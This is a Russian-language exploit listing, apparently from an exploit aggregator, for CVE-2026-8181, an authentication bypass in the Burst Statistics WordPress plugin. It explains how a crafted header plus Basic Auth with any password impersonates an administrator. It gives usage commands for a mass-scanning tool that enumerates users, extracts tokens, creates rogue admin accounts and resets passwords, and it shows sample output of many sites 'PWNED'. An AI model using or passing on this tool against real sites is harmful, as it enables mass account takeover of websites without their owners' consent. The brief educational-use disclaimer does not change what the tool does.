## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XSHADOW-HERE-CVE-2026-8181
# CVE-2026-8181
Burst Statistics | Обход аутентификации до захвата учётной записи администратора
### Описание :
Burst Statistics 3.4.0 - 3.4.1.1 - Обход аутентификации до захвата учётной записи администратора
Плагин Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) для WordPress уязвим к обходу аутентификации в версиях с 3.4.0 по 3.4.1.1. Это связано с некорректной обработкой возвращаемого значения в функции `is_mainwp_authenticated()` при проверке паролей приложений из заголовка Authorization. Функция вызывает `wp_authenticate_application_password(null, $username, $password)`, которая возвращает `null` (а не `WP_Error`), когда у целевого пользователя не настроены пароли приложений. Поскольку код проверяет только `is_wp_error()`, он переходит к вызову `wp_set_current_user()` — предоставляя атакующему полные привилегии администратора на весь запрос.
Обход срабатывает во время `plugins_loaded` (приоритет 9) через `has_admin_access()` в загрузчике плагина, то есть подмена пользователя происходит **до** того, как WordPress REST API обработает любой маршрут, — что позволяет получить доступ ко всем конечным точкам ядра WP (`/wp/v2/users`, `/wp/v2/users/me` и т. д.) от имени администратора.
Это позволяет неаутентифицированным атакующим, знающим имя пользователя администратора, выдать себя за этого администратора, указав любой случайный пароль Basic Authentication, что приводит к полному повышению привилегий и захвату учётной записи администратора.
# ИНФОРМАЦИЯ : **CVE-2026-8181**
~ **Оценка CVSS: 9.8 (Критический)**
~ **Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H**
~ **Затронутые версии: 3.4.0 - 3.4.1.1**
~ **Исправленная версия: 3.4.2**
* Исследователь : **Chloe Chamberland - Wordfence**
### Использование :
**Одиночная цель :**
* `python3 shadow.py -u https://target.com`
**Одиночная цель с известным именем пользователя :**
* `python3 shadow.py -u https://target.com -U admin`
**Массовые цели :**
* `python3 shadow.py -f targets.txt -t 20`
**Интерактивный режим :**
* `python3 shadow.py`
* введите имя файла с целями
* введите количество потоков (макс. 1-50)
* введите таймаут 5-30 с
### Возможности :
* Многопоточность (массовое сканирование до 50 потоков)
* Обход аутентификации через заголовок X-BURSTMAINWP + Basic Auth
* Автоматическое определение WordPress
* Определение версии Burst Statistics и проверка уязвимой версии
* Проверка доступности маршрута (`/burst/v1/mainwp-auth`)
* Перечисление пользователей (REST API + Author Archive + запасной вариант oEmbed)
* Извлечение токена пароля приложения
* Создание пользователя-администратора через WP REST API
* Сброс пароля администратора (запасной вариант)
* Проверка захвата через wp-login.php
* Автоматический откат HTTP/HTTPS и повторные попытки
* Тройной вывод (user.txt, token.txt, new-user-and-header.txt)
### Вывод :
root@kitploit:~
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
root@kitploit:~
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
## Дисклеймер :
## Этот инструмент предназначен только для образовательных целей и тестирования безопасности.
Несанкционированное использование систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.